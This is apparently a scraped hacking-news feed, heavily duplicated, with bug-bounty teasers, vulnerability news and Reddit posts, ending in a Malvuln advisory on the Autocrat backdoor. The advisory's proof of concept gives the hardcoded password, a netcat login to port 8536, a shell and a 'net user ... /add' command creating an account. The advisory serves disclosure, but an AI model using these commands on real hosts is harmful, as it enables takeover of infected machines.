How I Got the Hall of Fame in Few minutes
https://medium.com/@Onkarborude07/how-i-made-the-hall-of-fame-in-few-minutes-5831161d35be?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@Onkarborude07/how-i-made-the-hall-of-fame-in-few-minutes-5831161d35be?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
How I made the Hall of Fame in Few minutes
Hello Awesome INFOSEC COMMUNITY, I hope you all doing well! This Write-up is about how I made the hall of fame in 10 minutes. Today I’m…
Hello Awesome INFOSEC COMMUNITY, I hope you all doing well! This Write-up is about how I got the hall of fame in few minutes. Today I’m…Continue reading on Medium » (https://medium.com/@Onkarborude07/how-i-made-the-hall-of-fame-in-few-minutes-5831161d35be?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
How I made the Hall of Fame in Few minutes
Hello Awesome INFOSEC COMMUNITY, I hope you all doing well! This Write-up is about how I made the hall of fame in 10 minutes. Today I’m…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
P1 Bug — Leaked Zendesk Token in GitHub
https://cdn-images-1.medium.com/max/600/1*pIw77EvkJy71sXy_DkS_Qg.png
Version en Español
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
P1 Bug — Leaked Zendesk Token in GitHub
https://cdn-images-1.medium.com/max/600/1*pIw77EvkJy71sXy_DkS_Qg.png
Version en Español
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
P1 Bug — Leaked Zendesk Token in GitHub
Version en Español
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Ice — THM(easy)
https://cdn-images-1.medium.com/max/1009/1*P_iKu-JQqxKidXQzz7zUFA.png
Sequel to blue, is a windows machine with poorly configured settings.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Ice — THM(easy)
https://cdn-images-1.medium.com/max/1009/1*P_iKu-JQqxKidXQzz7zUFA.png
Sequel to blue, is a windows machine with poorly configured settings.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Ice — THM(easy)
Sequel to blue, is a windows machine with poorly configured settings.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Millones de dispositivos Android aún no tienen parches para fallas en la GPU de Mali
https://cdn-images-1.medium.com/max/1673/0*Zwe8WRMLOjGKT8u5
Un conjunto de cinco fallas de seguridad de gravedad media en el controlador de GPU Mali de Arm ha permanecido sin parches en los…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Millones de dispositivos Android aún no tienen parches para fallas en la GPU de Mali
https://cdn-images-1.medium.com/max/1673/0*Zwe8WRMLOjGKT8u5
Un conjunto de cinco fallas de seguridad de gravedad media en el controlador de GPU Mali de Arm ha permanecido sin parches en los…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Millones de dispositivos Android aún no tienen parches para fallas en la GPU de Mali
Un conjunto de cinco fallas de seguridad de gravedad media en el controlador de GPU Mali de Arm ha permanecido sin parches en los…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
A GPU security flaw makes millions of Android devices vulnerable
https://cdn-images-1.medium.com/max/2600/1*I5OvAq5DbqZJS6Cb0TqXJg.png
Thanks to these vulnerabilities a malicious attacker has the ability to gain non-privileged user access to the device, execute native code
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
A GPU security flaw makes millions of Android devices vulnerable
https://cdn-images-1.medium.com/max/2600/1*I5OvAq5DbqZJS6Cb0TqXJg.png
Thanks to these vulnerabilities a malicious attacker has the ability to gain non-privileged user access to the device, execute native code
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
A GPU security flaw makes millions of Android devices vulnerable
Thanks to these vulnerabilities a malicious attacker has the ability to gain non-privileged user access to the device, execute native code
hacking: security in practice
Anyone learning ethical hacking as a hobby?
I started a couple of months ago, but I feel I can be more productive in learning everything, currently going through a Udemy course which uses kali, any other suggestions ?
I read the post that suggests CTF, I feel like I’m no where close to that level
submitted by /u/kindessissupreme
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Anyone learning ethical hacking as a hobby?
I started a couple of months ago, but I feel I can be more productive in learning everything, currently going through a Udemy course which uses kali, any other suggestions ?
I read the post that suggests CTF, I feel like I’m no where close to that level
submitted by /u/kindessissupreme
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Anyone learning ethical hacking as a hobby?
I started a couple of months ago, but I feel I can be more productive in learning everything, currently going through a Udemy course which uses...
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Docker Hub repositories hide over 1,650 malicious containers
https://external-preview.redd.it/YqYFxoe9_0XeXEwJBpjkSWmFnnMH8BWnkWYQrqZIe8U.jpg?width=640&crop=smart&auto=webp&s=b5f1c0da70c546f195f80509bcce90c9ddc76f64 submitted by /u/CodePerfect
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Docker Hub repositories hide over 1,650 malicious containers
https://external-preview.redd.it/YqYFxoe9_0XeXEwJBpjkSWmFnnMH8BWnkWYQrqZIe8U.jpg?width=640&crop=smart&auto=webp&s=b5f1c0da70c546f195f80509bcce90c9ddc76f64 submitted by /u/CodePerfect
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Docker Hub repositories hide over 1,650 malicious containers
Posted in r/hacking by u/CodePerfect • 230 points and 14 comments
hacking: security in practice
can I locate a phone mmmmm
I really really really need to locate someone right now is there a website or anything like that it's a matter of life and death literally pls help I only have their messager/telegram
submitted by /u/krzeslodobiurka
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
can I locate a phone mmmmm
I really really really need to locate someone right now is there a website or anything like that it's a matter of life and death literally pls help I only have their messager/telegram
submitted by /u/krzeslodobiurka
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
can I locate a phone mmmmm
I really really really need to locate someone right now is there a website or anything like that it's a matter of life and death literally pls...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.Autocrat.b MVID-2022-0660 Weak Hardcoded Credential
https://1.bp.blogspot.com/-f08tQl4ET7w/WWlvRxSI6FI/AAAAAAAAINU/PQjq5zhIC6AFgb3OPDnJIpwa9KgUsaunwCLcBGAs/s1600/h37.png
Backdoor.Win32.Autocrat.b malware suffers from a weak hardcoded credential vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.Autocrat.b MVID-2022-0660 Weak Hardcoded Credential
https://1.bp.blogspot.com/-f08tQl4ET7w/WWlvRxSI6FI/AAAAAAAAINU/PQjq5zhIC6AFgb3OPDnJIpwa9KgUsaunwCLcBGAs/s1600/h37.png
Backdoor.Win32.Autocrat.b malware suffers from a weak hardcoded credential vulnerability.
SHA-256 |
d7a1dbe69c51797b7a119cf51d50bfdc0cf2f5d6383559a3c42e0b551d24f2ffDownload
Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022
Original source: https://malvuln.com/advisory/4262a8b52b902aa2e6bf02a156d1b8d4.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Backup media: infosec.exchange/@malvuln
Threat: Backdoor.Win32.Autocrat.b
Vulnerability: Weak Hardcoded Credentials
Description: The malware is packed with PeCompact, listens on TCP port 8536 and requires authentication. However, the password "autocrat" is weak and hardcoded within the PE file. Unpacking the executable, easily reveals the cleartext password.
Family: Autocrat
Type: PE32
MD5: 4262a8b52b902aa2e6bf02a156d1b8d4
Vuln ID: MVID-2022-0660
Dropped files: srvsupp.exe
Disclosure: 11/24/2022
Exploit/PoC:
C:\Users\gg\Desktop>nc64.exe x.x.x.x 8536
Login:autocrat
WinShell v5.0 (C)2002 janker.org
? for help
CMD>?
i Install
r Remove
p Path
b reBoot
d shutDown
s Shell
x eXit
q Quit
Download:
CMD>http://.../srv.exe
? for help
CMD>s
Microsoft Windows [Version 10.0.16299.309]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Users\Victim\Desktop>whoami
whoami
desktop-2c3iqho\victim
C:\Users\Victim\Desktop>net user apparitionsec 666 /add
net user apparitionsec 666 /add
The command completed successfully.
C:\Users\Victim\Desktop>
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.Autocrat.b MVID-2022-0660 Weak Hardcoded Credential
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.